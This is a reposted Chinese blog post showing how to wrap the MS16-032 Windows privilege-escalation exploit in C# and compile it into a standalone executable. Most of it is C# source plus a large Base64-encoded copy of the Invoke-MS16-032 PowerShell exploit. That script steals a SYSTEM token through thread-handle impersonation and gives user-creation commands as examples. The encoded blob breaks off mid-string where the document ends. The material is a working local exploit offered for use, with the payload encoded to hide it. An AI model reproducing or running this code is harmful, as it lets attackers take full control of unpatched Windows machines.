转载

编译你的Powershell( MS16-032为例)

授人以鱼不如授人以渔

之前的MS16-032是个powershell脚本,怎么样改成exe呢,很简单。使用.net直接简单的修改编译就可以了。已经改好的代码在这里:

戳我

gist貌似被墙了,我在这里也贴一下:

/* Author: Evilcg, Twitter: @Evilcg Step One: PS C:/> [psobject].Assembly.Location C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.Management.Automation.dll Step Two: C:/Windows/Microsoft.NET/Framework/v4.0.30319/csc.exe  /reference:"C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.Management.Automation.dll" /out:MS16_032.exe MS16_032.cs */  // Windows 10 reference may be Here: C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35 using System; using System.IO; using System.Collections.Generic; using System.Collections.ObjectModel; using System.Text; using System.Threading.Tasks; using System.Management.Automation; using System.Management.Automation.Host; using System.Management.Automation.Runspaces;  namespace ConsoleApplication1 {     class Program     {         static string _application;         static string _commandline;         static int Main(string[] args)         {              if (args.Length == 0)             {                 System.Console.WriteLine("Usage: MS16_032.exe calc.exe OR MS16_032.exe cmd.exe /"/c clac.exe/"");                 return 1;             }              else if (args.Length ==1)             {                  _application = args[0];                          PowerShellExecutor t = new PowerShellExecutor();                 t.ExecuteSynchronously(_application, "");             }             else if(args.Length == 2)             {                 _application = args[0];                 _commandline = args[1];                 PowerShellExecutor t = new PowerShellExecutor();                 t.ExecuteSynchronously(_application, _commandline);             }             return 0;                      }     }      class PowerShellExecutor     {         public static string PSInvoke_MS16_032 = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(@"ZnVuY3Rpb24gSW52b2tlLU1TMTYtMDMyIHsKPCMKLlNZTk9QU0lTCiAgICAKICAgIFBvd2VyU2hlbGwgaW1wbGVtZW50YXRpb24gb2YgTVMxNi0wMzIuIFRoZSBleHBsb2l0IHRhcmdldHMgYWxsIHZ1bG5lcmFibGUKICAgIG9wZXJhdGluZyBzeXN0ZW1zIHRoYXQgc3VwcG9ydCBQb3dlclNoZWxsIHYyKy4gQ3JlZGl0IGZvciB0aGUgZGlzY292ZXJ5IG9mCiAgICB0aGUgYnVnIGFuZCB0aGUgbG9naWMgdG8gZXhwbG9pdCBpdCBnbyB0byBKYW1lcyBGb3JzaGF3IChAdGlyYW5pZGRvKS4KICAgIAogICAgVGFyZ2V0czoKICAgIAogICAgKiBXaW43LVdpbjEwICYgMms4LTJrMTIgPD09IDMyLzY0IGJpdCEKICAgICogVGVzdGVkIG9uIHgzMiBXaW43LCB4NjQgV2luOCwgeDY0IDJrMTJSMgogICAgCiAgICBOb3RlczoKICAgIAogICAgKiBJbiBvcmRlciBmb3IgdGhlIHJhY2UgY29uZGl0aW9uIHRvIHN1Y2NlZWQgdGhlIG1hY2hpbmUgbXVzdCBoYXZlIDIrIENQVQogICAgICBjb3Jlcy4gSWYgdGVzdGluZyBpbiBhIFZNIGp1c3QgbWFrZSBzdXJlIHRvIGFkZCBhIGNvcmUgaWYgbmVlZGVkIG1rYXkuCiAgICAqIFRoZSBleHBsb2l0IGlzIHByZXR0eSByZWxpYWJsZSwgaG93ZXZlciB+MS82IHRpbWVzIGl0IHdpbGwgc2F5IGl0IHN1Y2NlZWRlZAogICAgICBidXQgbm90IHNwYXduIGEgc2hlbGwuIE5vdCBzdXJlIHdoYXQgdGhlIGlzc3VlIGlzIGJ1dCBqdXN0IHJlLXJ1biBhbmQgcHJvZml0IQogICAgKiBXYW50IHRvIGtub3cgbW9yZSBhYm91dCBNUzE2LTAzMiA9PT4KICAgICAgaHR0cHM6Ly9nb29nbGVwcm9qZWN0emVyby5ibG9nc3BvdC5jby51ay8yMDE2LzAzL2V4cGxvaXRpbmctbGVha2VkLXRocmVhZC1oYW5kbGUuaHRtbAoKLkRFU0NSSVBUSU9OCiAgICBBdXRob3I6IFJ1YmVuIEJvb25lbiAoQEZ1enp5U2VjKQogICAgQmxvZzogaHR0cDovL3d3dy5mdXp6eXNlY3VyaXR5LmNvbS8KICAgIExpY2Vuc2U6IEJTRCAzLUNsYXVzZQogICAgUmVxdWlyZWQgRGVwZW5kZW5jaWVzOiBQb3dlclNoZWxsIHYyKwogICAgT3B0aW9uYWwgRGVwZW5kZW5jaWVzOiBOb25lCgouUEFSQU1FVEVSIEFwcGxpY2F0aW9uCgpTcGVjaWZpZXMgYW4gQXBwbGljYXRpb24gdG8gcnVuLgoKLlBBUkFNRVRFUiBDb21tYW5kbGluZQoKU3BlY2lmaWVzIENvbW1hbmRsaW5lLCBzdWNoIGFzIG5ldCB1c2VyIHh4eCB4eHggL2FkZAogICAgCi5FWEFNUExFCiAgICBDOlxQUz4gSW52b2tlLU1TMTYtMDMyIC1BcHBsaWNhdGlvbiBDOlxXaW5kb3dzXFN5c3RlbTMyXGNtZC5leGUKICAgIEM6XFBTPiBJbnZva2UtTVMxNi0wMzIgLUFwcGxpY2F0aW9uIEM6XFdpbmRvd3NcU3lzdGVtMzJcY21kLmV4ZSAtQ29tbWFuZGxpbmUgIi9jIG5ldCB1c2VyIDEgMSAvYWRkIgoKIz4KICBbQ21kbGV0QmluZGluZygpXQogICAgcGFyYW0oCiAgICAgICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkRmFsc2UsIFBhcmFtZXRlclNldE5hbWUgPSAnQzpcV2luZG93c1xTeXN0ZW0zMlxjbWQuZXhlJyApXQogICAgICAgIFtzdHJpbmddCiAgICAgICAgJEFwcGxpY2F0aW9uLAoKICAgICAgICBbUGFyYW1ldGVyKE1hbmRhdG9yeSA9ICRGYWxzZSldCiAgICAgICAgW3N0cmluZ10KICAgICAgICAkQ29tbWFuZGxpbmUKICAgICAgICApCgoKICAgIEFkZC1UeXBlIC1UeXBlRGVmaW5pdGlvbiBAIgogICAgdXNpbmcgU3lzdGVtOwogICAgdXNpbmcgU3lzdGVtLkRpYWdub3N0aWNzOwogICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwogICAgdXNpbmcgU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbDsKICAgIAogICAgW1N0cnVjdExheW91dChMYXlvdXRLaW5kLlNlcXVlbnRpYWwpXQogICAgcHVibGljIHN0cnVjdCBQUk9DRVNTX0lORk9STUFUSU9OCiAgICB7CiAgICAgICAgcHVibGljIEludFB0ciBoUHJvY2VzczsKICAgICAgICBwdWJsaWMgSW50UHRyIGhUaHJlYWQ7CiAgICAgICAgcHVibGljIGludCBkd1Byb2Nlc3NJZDsKICAgICAgICBwdWJsaWMgaW50IGR3VGhyZWFkSWQ7CiAgICB9CiAgICAKICAgIFtTdHJ1Y3RMYXlvdXQoTGF5b3V0S2luZC5TZXF1ZW50aWFsLCBDaGFyU2V0PUNoYXJTZXQuVW5pY29kZSldCiAgICBwdWJsaWMgc3RydWN0IFNUQVJUVVBJTkZPCiAgICB7CiAgICAgICAgcHVibGljIEludDMyIGNiOwogICAgICAgIHB1YmxpYyBzdHJpbmcgbHBSZXNlcnZlZDsKICAgICAgICBwdWJsaWMgc3RyaW5nIGxwRGVza3RvcDsKICAgICAgICBwdWJsaWMgc3RyaW5nIGxwVGl0bGU7CiAgICAgICAgcHVibGljIEludDMyIGR3WDsKICAgICAgICBwdWJsaWMgSW50MzIgZHdZOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd1hTaXplOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd1lTaXplOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd1hDb3VudENoYXJzOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd1lDb3VudENoYXJzOwogICAgICAgIHB1YmxpYyBJbnQzMiBkd0ZpbGxBdHRyaWJ1dGU7CiAgICAgICAgcHVibGljIEludDMyIGR3RmxhZ3M7CiAgICAgICAgcHVibGljIEludDE2IHdTaG93V2luZG93OwogICAgICAgIHB1YmxpYyBJbnQxNiBjYlJlc2VydmVkMjsKICAgICAgICBwdWJsaWMgSW50UHRyIGxwUmVzZXJ2ZWQyOwogICAgICAgIHB1YmxpYyBJbnRQdHIgaFN0ZElucHV0OwogICAgICAgIHB1YmxpYyBJbnRQdHIgaFN0ZE91dHB1dDsKICAgICAgICBwdWJsaWMgSW50UHRyIGhTdGRFcnJvcjsKICAgIH0KICAgIAogICAgW1N0cnVjdExheW91dChMYXlvdXRLaW5kLlNlcXVlbnRpYWwpXQogICAgcHVibGljIHN0cnVjdCBTUU9TCiAgICB7CiAgICAgICAgcHVibGljIGludCBMZW5ndGg7CiAgICAgICAgcHVibGljIGludCBJbXBlcnNvbmF0aW9uTGV2ZWw7CiAgICAgICAgcHVibGljIGludCBDb250ZXh0VHJhY2tpbmdNb2RlOwogICAgICAgIHB1YmxpYyBib29sIEVmZmVjdGl2ZU9ubHk7CiAgICB9CiAgICAKICAgIHB1YmxpYyBzdGF0aWMgY2xhc3MgQWR2YXBpMzIKICAgIHsKICAgICAgICBbRGxsSW1wb3J0KCJhZHZhcGkzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSwgQ2hhclNldD1DaGFyU2V0LlVuaWNvZGUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgQ3JlYXRlUHJvY2Vzc1dpdGhMb2dvblcoCiAgICAgICAgICAgIFN0cmluZyB1c2VyTmFtZSwKICAgICAgICAgICAgU3RyaW5nIGRvbWFpbiwKICAgICAgICAgICAgU3RyaW5nIHBhc3N3b3JkLAogICAgICAgICAgICBpbnQgbG9nb25GbGFncywKICAgICAgICAgICAgU3RyaW5nIGFwcGxpY2F0aW9uTmFtZSwKICAgICAgICAgICAgU3RyaW5nIGNvbW1hbmRMaW5lLAogICAgICAgICAgICBpbnQgY3JlYXRpb25GbGFncywKICAgICAgICAgICAgaW50IGVudmlyb25tZW50LAogICAgICAgICAgICBTdHJpbmcgY3VycmVudERpcmVjdG9yeSwKICAgICAgICAgICAgcmVmICBTVEFSVFVQSU5GTyBzdGFydHVwSW5mbywKICAgICAgICAgICAgb3V0IFBST0NFU1NfSU5GT1JNQVRJT04gcHJvY2Vzc0luZm9ybWF0aW9uKTsKICAgICAgICAgICAgCiAgICAgICAgW0RsbEltcG9ydCgiYWR2YXBpMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgU2V0VGhyZWFkVG9rZW4oCiAgICAgICAgICAgIHJlZiBJbnRQdHIgVGhyZWFkLAogICAgICAgICAgICBJbnRQdHIgVG9rZW4pOwogICAgICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJhZHZhcGkzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBPcGVuVGhyZWFkVG9rZW4oCiAgICAgICAgICAgIEludFB0ciBUaHJlYWRIYW5kbGUsCiAgICAgICAgICAgIGludCBEZXNpcmVkQWNjZXNzLAogICAgICAgICAgICBib29sIE9wZW5Bc1NlbGYsCiAgICAgICAgICAgIG91dCBJbnRQdHIgVG9rZW5IYW5kbGUpOwogICAgICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJhZHZhcGkzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBPcGVuUHJvY2Vzc1Rva2VuKAogICAgICAgICAgICBJbnRQdHIgUHJvY2Vzc0hhbmRsZSwgCiAgICAgICAgICAgIGludCBEZXNpcmVkQWNjZXNzLAogICAgICAgICAgICByZWYgSW50UHRyIFRva2VuSGFuZGxlKTsKICAgICAgICAgICAgCiAgICAgICAgW0RsbEltcG9ydCgiYWR2YXBpMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBleHRlcm4gc3RhdGljIGJvb2wgRHVwbGljYXRlVG9rZW4oCiAgICAgICAgICAgIEludFB0ciBFeGlzdGluZ1Rva2VuSGFuZGxlLAogICAgICAgICAgICBpbnQgU0VDVVJJVFlfSU1QRVJTT05BVElPTl9MRVZFTCwKICAgICAgICAgICAgcmVmIEludFB0ciBEdXBsaWNhdGVUb2tlbkhhbmRsZSk7CiAgICB9CiAgICAKICAgIHB1YmxpYyBzdGF0aWMgY2xhc3MgS2VybmVsMzIKICAgIHsKICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiKV0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiB1aW50IEdldExhc3RFcnJvcigpOwogICAgCiAgICAgICAgW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRDdXJyZW50UHJvY2VzcygpOwogICAgCiAgICAgICAgW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRDdXJyZW50VGhyZWFkKCk7CiAgICAgICAgCiAgICAgICAgW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBHZXRUaHJlYWRJZChJbnRQdHIgaFRocmVhZCk7CiAgICAgICAgCiAgICAgICAgW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yID0gdHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gaW50IEdldFByb2Nlc3NJZE9mVGhyZWFkKEludFB0ciBoYW5kbGUpOwogICAgICAgIAogICAgICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIsU2V0TGFzdEVycm9yPXRydWUpXQogICAgICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGludCBTdXNwZW5kVGhyZWFkKEludFB0ciBoVGhyZWFkKTsKICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLFNldExhc3RFcnJvcj10cnVlKV0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgUmVzdW1lVGhyZWFkKEludFB0ciBoVGhyZWFkKTsKICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBUZXJtaW5hdGVQcm9jZXNzKAogICAgICAgICAgICBJbnRQdHIgaFByb2Nlc3MsCiAgICAgICAgICAgIHVpbnQgdUV4aXRDb2RlKTsKICAgIAogICAgICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIsIFNldExhc3RFcnJvcj10cnVlKV0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIENsb3NlSGFuZGxlKEludFB0ciBoT2JqZWN0KTsKICAgICAgICAKICAgICAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBEdXBsaWNhdGVIYW5kbGUoCiAgICAgICAgICAgIEludFB0ciBoU291cmNlUHJvY2Vzc0hhbmRsZSwKICAgICAgICAgICAgSW50UHRyIGhTb3VyY2VIYW5kbGUsCiAgICAgICAgICAgIEludFB0ciBoVGFyZ2V0UHJvY2Vzc0hhbmRsZSwKICAgICAgICAgICAgcmVmIEludFB0ciBscFRhcmdldEhhbmRsZSwKICAgICAgICAgICAgaW50IGR3RGVzaXJlZEFjY2VzcywKICAgICAgICAgICAgYm9vbCBiSW5oZXJpdEhhbmRsZSwKICAgICAgICAgICAgaW50IGR3T3B0aW9ucyk7CiAgICB9CiAgICAKICAgIHB1YmxpYyBzdGF0aWMgY2xhc3MgTnRkbGwKICAgIHsKICAgICAgICBbRGxsSW1wb3J0KCJudGRsbC5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gaW50IE50SW1wZXJzb25hdGVUaHJlYWQoCiAgICAgICAgICAgIEludFB0ciBUaHJlYWRIYW5kbGUsCiAgICAgICAgICAgIEludFB0ciBUaHJlYWRUb0ltcGVyc29uYXRlLAogICAgICAgICAgICByZWYgU1FPUyBTZWN1cml0eVF1YWxpdHlPZlNlcnZpY2UpOwogICAgfQoiQAoKICAgIGZ1bmN0aW9uIEdldC1UaHJlYWRIYW5kbGUgewogICAgICAgICMgU3RhcnR1cEluZm8gU3RydWN0CiAgICAgICAgJFN0YXJ0dXBJbmZvID0gTmV3LU9iamVjdCBTVEFSVFVQSU5GTwogICAgICAgICRTdGFydHVwSW5mby5kd0ZsYWdzID0gMHgwMDAwMDEwMSAjIFNUQVJURl9VU0VTVERIQU5ETEVTCiAgICAgICAgICAgICRTdGFydHVwSW5mby53U2hvd1dpbmRvdyA9IDA7CiAgICAgICAgJFN0YXJ0dXBJbmZvLmhTdGRJbnB1dCA9IFtLZXJuZWwzMl06OkdldEN1cnJlbnRUaHJlYWQoKQogICAgICAgICRTdGFydHVwSW5mby5oU3RkT3V0cHV0ID0gW0tlcm5lbDMyXTo6R2V0Q3VycmVudFRocmVhZCgpCiAgICAgICAgJFN0YXJ0dXBJbmZvLmhTdGRFcnJvciA9IFtLZXJuZWwzMl06OkdldEN1cnJlbnRUaHJlYWQoKQogICAgICAgICRTdGFydHVwSW5mby5jYiA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OlNpemVPZigkU3RhcnR1cEluZm8pICMgU3RydWN0IFNpemUKICAgICAgICAKICAgICAgICAjIFByb2Nlc3NJbmZvIFN0cnVjdAogICAgICAgICRQcm9jZXNzSW5mbyA9IE5ldy1PYmplY3QgUFJPQ0VTU19JTkZPUk1BVElPTgogICAgICAgIAogICAgICAgICMgQ3JlYXRlUHJvY2Vzc1dpdGhMb2dvblcgLS0+IGxwQ3VycmVudERpcmVjdG9yeQogICAgICAgICRHZXRDdXJyZW50UGF0aCA9IChHZXQtSXRlbSAtUGF0aCAiLlwiIC1WZXJib3NlKS5GdWxsTmFtZQogICAgICAgIAogICAgICAgICMgTE9HT05fTkVUQ1JFREVOVElBTFNfT05MWSAvIENSRUFURV9TVVNQRU5ERUQKICAgICAgICAkQ2FsbFJlc3VsdCA9IFtBZHZhcGkzMl06OkNyZWF0ZVByb2Nlc3NXaXRoTG9nb25XKAogICAgICAgICAgICAidXNlciIsICJkb21haW4iLCAicGFzcyIsCiAgICAgICAgICAgIDB4MDAwMDAwMDIsICJDOlxXaW5kb3dzXFN5c3RlbTMyXG5vdGVwYWQuZXhlIiwgIiIsCiAgICAgICAgICAgIDB4MDAwMDAwMDQsICRudWxsLCAkR2V0Q3VycmVudFBhdGgsCiAgICAgICAgICAgIFtyZWZdJFN0YXJ0dXBJbmZvLCBbcmVmXSRQcm9jZXNzSW5mbykKICAgICAgICAKICAgICAgICAjIER1cGxpY2F0ZSBoYW5kbGUgaW50byBjdXJyZW50IHByb2Nlc3MgLT4gRFVQTElDQVRFX1NBTUVfQUNDRVNTCiAgICAgICAgJGxwVGFyZ2V0SGFuZGxlID0gW0ludFB0cl06Olplcm8KICAgICAgICAkQ2FsbFJlc3VsdCA9IFtLZXJuZWwzMl06OkR1cGxpY2F0ZUhhbmRsZSgKICAgICAgICAgICAgJFByb2Nlc3NJbmZvLmhQcm9jZXNzLCAweDQsCiAgICAgICAgICAgIFtLZXJuZWwzMl06OkdldEN1cnJlbnRQcm9jZXNzKCksCiAgICAgICAgICAgIFtyZWZdJGxwVGFyZ2V0SGFuZGxlLCAwLCAkZmFsc2UsCiAgICAgICAgICAgIDB4MDAwMDAwMDIpCiAgICAgICAgCiAgICAgICAgIyBDbGVhbiB1cCBzdXNwZW5kZWQgcHJvY2VzcwogICAgICAgICRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6VGVybWluYXRlUHJvY2VzcygkUHJvY2Vzc0luZm8uaFByb2Nlc3MsIDEpCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFByb2Nlc3MpCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFRocmVhZCkKICAgICAgICAKICAgICAgICAkbHBUYXJnZXRIYW5kbGUKICAgIH0KICAgIAogICAgZnVuY3Rpb24gR2V0LVN5c3RlbVRva2VuIHsKICAgICAgICBlY2hvICJgbls/XSBUcnlpbmcgdGhyZWFkIGhhbmRsZTogJFRocmVhZCIKICAgICAgICBlY2hvICJbP10gVGhyZWFkIGJlbG9uZ3MgdG86ICQoJChHZXQtUHJvY2VzcyAtUElEICQoW0tlcm5lbDMyXTo6R2V0UHJvY2Vzc0lkT2ZUaHJlYWQoJFRocmVhZCkpKS5Qcm9jZXNzTmFtZSkiCiAgICAKICAgICAgICAkQ2FsbFJlc3VsdCA9IFtLZXJuZWwzMl06OlN1c3BlbmRUaHJlYWQoJFRocmVhZCkKICAgICAgICBpZiAoJENhbGxSZXN1bHQgLW5lIDApIHsKICAgICAgICAgICAgZWNobyAiWyFdICRUaHJlYWQgaXMgYSBiYWQgdGhyZWFkLCBtb3Zpbmcgb24uLiIKICAgICAgICAgICAgUmV0dXJuCiAgICAgICAgfSBlY2hvICJbK10gVGhyZWFkIHN1c3BlbmRlZCIKICAgICAgICAKICAgICAgICBlY2hvICJbPl0gV2lwaW5nIGN1cnJlbnQgaW1wZXJzb25hdGlvbiB0b2tlbiIKICAgICAgICAkQ2FsbFJlc3VsdCA9IFtBZHZhcGkzMl06OlNldFRocmVhZFRva2VuKFtyZWZdJFRocmVhZCwgW0ludFB0cl06Olplcm8pCiAgICAgICAgaWYgKCEkQ2FsbFJlc3VsdCkgewogICAgICAgICAgICBlY2hvICJbIV0gU2V0VGhyZWFkVG9rZW4gZmFpbGVkLCBtb3Zpbmcgb24uLiIKICAgICAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpSZXN1bWVUaHJlYWQoJFRocmVhZCkKICAgICAgICAgICAgZWNobyAiWytdIFRocmVhZCByZXN1bWVkISIKICAgICAgICAgICAgUmV0dXJuCiAgICAgICAgfQogICAgICAgIAogICAgICAgIGVjaG8gIls+XSBCdWlsZGluZyBTWVNURU0gaW1wZXJzb25hdGlvbiB0b2tlbiIKICAgICAgICAjIFNlY3VyaXR5UXVhbGl0eU9mU2VydmljZSBzdHJ1Y3QKICAgICAgICAkU1FPUyA9IE5ldy1PYmplY3QgU1FPUwogICAgICAgICRTUU9TLkltcGVyc29uYXRpb25MZXZlbCA9IDIgI1NlY3VyaXR5SW1wZXJzb25hdGlvbgogICAgICAgICRTUU9TLkxlbmd0aCA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OlNpemVPZigkU1FPUykKICAgICAgICAjIFVuZG9jdW1lbnRlZCBBUEkncywgSSBsaWtlIHlvdXIgc3R5bGUgTWljcm9zb2Z0IDspCiAgICAgICAgJENhbGxSZXN1bHQgPSBbTnRkbGxdOjpOdEltcGVyc29uYXRlVGhyZWFkKCRUaHJlYWQsICRUaHJlYWQsIFtyZWZdJHNxb3MpCiAgICAgICAgaWYgKCRDYWxsUmVzdWx0IC1uZSAwKSB7CiAgICAgICAgICAgIGVjaG8gIlshXSBOdEltcGVyc29uYXRlVGhyZWFkIGZhaWxlZCwgbW92aW5nIG9uLi4iCiAgICAgICAgICAgICRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6UmVzdW1lVGhyZWFkKCRUaHJlYWQpCiAgICAgICAgICAgIGVjaG8gIlsrXSBUaHJlYWQgcmVzdW1lZCEiCiAgICAgICAgICAgIFJldHVybgogICAgICAgIH0KICAgIAogICAgICAgICRzY3JpcHQ6U3lzVG9rZW5IYW5kbGUgPSBbSW50UHRyXTo6WmVybwogICAgICAgICMgMHgwMDA2IC0tPiBUT0tFTl9EVVBMSUNBVEUgLWJvciBUT0tFTl9JTVBFUlNPTkFURQogICAgICAgICRDYWxsUmVzdWx0ID0gW0FkdmFwaTMyXTo6T3BlblRocmVhZFRva2VuKCRUaHJlYWQsIDB4MDAwNiwgJGZhbHNlLCBbcmVmXSRTeXNUb2tlbkhhbmRsZSkKICAgICAgICBpZiAoISRDYWxsUmVzdWx0KSB7CiAgICAgICAgICAgIGVjaG8gIlshXSBPcGVuVGhyZWFkVG9rZW4gZmFpbGVkLCBtb3Zpbmcgb24uLiIKICAgICAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpSZXN1bWVUaHJlYWQoJFRocmVhZCkKICAgICAgICAgICAgZWNobyAiWytdIFRocmVhZCByZXN1bWVkISIKICAgICAgICAgICAgUmV0dXJuCiAgICAgICAgfQogICAgICAgIAogICAgICAgIGVjaG8gIls/XSBTdWNjZXNzLCBvcGVuIFNZU1RFTSB0b2tlbiBoYW5kbGU6ICRTeXNUb2tlbkhhbmRsZSIKICAgICAgICBlY2hvICJbK10gUmVzdW1pbmcgdGhyZWFkLi4iCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpSZXN1bWVUaHJlYWQoJFRocmVhZCkKICAgIH0KICAgIAogICAgIyBtYWluKCkgPC0tLSA7KQogICAgJG1zMTYwMzIgPSBAIgogICAgIF9fIF9fIF9fXyBfX18gICBfX18gICAgIF9fXyBfX18gX19fIAogICAgfCAgViAgfCAgX3xfICB8IHwgIF98X19ffCAgIHxfICB8XyAgfAogICAgfCAgICAgfF8gIHxffCB8X3wgLiB8X19ffCB8IHxfICB8ICBffAogICAgfF98X3xffF9fX3xfX19fX3xfX198ICAgfF9fX3xfX198X19ffAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICBbYnkgYjMzZiAtPiBARnV6enlTZWNdCiJACiAgICAKICAgICRtczE2MDMyCiAgICAKICAgICMgQ2hlY2sgbG9naWNhbCBwcm9jZXNzb3IgY291bnQsIHJhY2UgY29uZGl0aW9uIHJlcXVpcmVzIDIrCiAgICBlY2hvICJgbls/XSBPcGVyYXRpbmcgc3lzdGVtIGNvcmUgY291bnQ6ICQoW1N5c3RlbS5FbnZpcm9ubWVudF06OlByb2Nlc3NvckNvdW50KSIKICAgIGlmICgkKFtTeXN0ZW0uRW52aXJvbm1lbnRdOjpQcm9jZXNzb3JDb3VudCkgLWx0IDIpIHsKICAgICAgICBlY2hvICJbIV0gVGhpcyBpcyBhIFZNIGlzbid0IGl0LCByYWNlIGNvbmRpdGlvbiByZXF1aXJlcyBhdCBsZWFzdCAyIENQVSBjb3JlcywgZXhpdGluZyFgbiIKICAgICAgICBSZXR1cm4KICAgIH0KICAgIAogICAgIyBDcmVhdGUgYXJyYXkgZm9yIFRocmVhZHMgJiBUSUQncwogICAgJFRocmVhZEFycmF5ID0gQCgpCiAgICAkVGlkQXJyYXkgPSBAKCkKICAgIAogICAgZWNobyAiWz5dIER1cGxpY2F0aW5nIENyZWF0ZVByb2Nlc3NXaXRoTG9nb25XIGhhbmRsZXMuLiIKICAgICMgTG9vcCBHZXQtVGhyZWFkSGFuZGxlIGFuZCBjb2xsZWN0IHRocmVhZCBoYW5kbGVzIHdpdGggYSB2YWxpZCBUSUQKICAgIGZvciAoJGk9MDsgJGkgLWx0IDUwMDsgJGkrKykgewogICAgICAgICRoVGhyZWFkID0gR2V0LVRocmVhZEhhbmRsZQogICAgICAgICRoVGhyZWFkSUQgPSBbS2VybmVsMzJdOjpHZXRUaHJlYWRJZCgkaFRocmVhZCkKICAgICAgICAjIEJpdCBoYWNreS9sYXp5LCBmaWx0ZXJzIG9uIHVuaXEvdmFsaWQgVElEJ3MgdG8gY3JlYXRlICRUaHJlYWRBcnJheQogICAgICAgIGlmICgkVGlkQXJyYXkgLW5vdGNvbnRhaW5zICRoVGhyZWFkSUQpIHsKICAgICAgICAgICAgJFRpZEFycmF5ICs9ICRoVGhyZWFkSUQKICAgICAgICAgICAgaWYgKCRoVGhyZWFkIC1uZSAwKSB7CiAgICAgICAgICAgICAgICAkVGhyZWFkQXJyYXkgKz0gJGhUaHJlYWQgIyBUaGlzIGlzIHdoYXQgd2UgbmVlZCEKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIH0KICAgIAogICAgaWYgKCQoJFRocmVhZEFycmF5Lmxlbmd0aCkgLWVxIDApIHsKICAgICAgICBlY2hvICJbIV0gTm8gdmFsaWQgdGhyZWFkIGhhbmRsZXMgd2VyZSBjYXB0dXJlZCwgZXhpdGluZyEiCiAgICAgICAgUmV0dXJuCiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIls/XSBEb25lLCBnb3QgJCgkVGhyZWFkQXJyYXkubGVuZ3RoKSB0aHJlYWQgaGFuZGxlKHMpISIKICAgICAgICBlY2hvICJgbls/XSBUaHJlYWQgaGFuZGxlIGxpc3Q6IgogICAgICAgICRUaHJlYWRBcnJheQogICAgfQogICAgCiAgICBlY2hvICJgblsqXSBTbmlmZmluZyBvdXQgcHJpdmlsZWdlZCBpbXBlcnNvbmF0aW9uIHRva2VuLi4iCiAgICBmb3JlYWNoICgkVGhyZWFkIGluICRUaHJlYWRBcnJ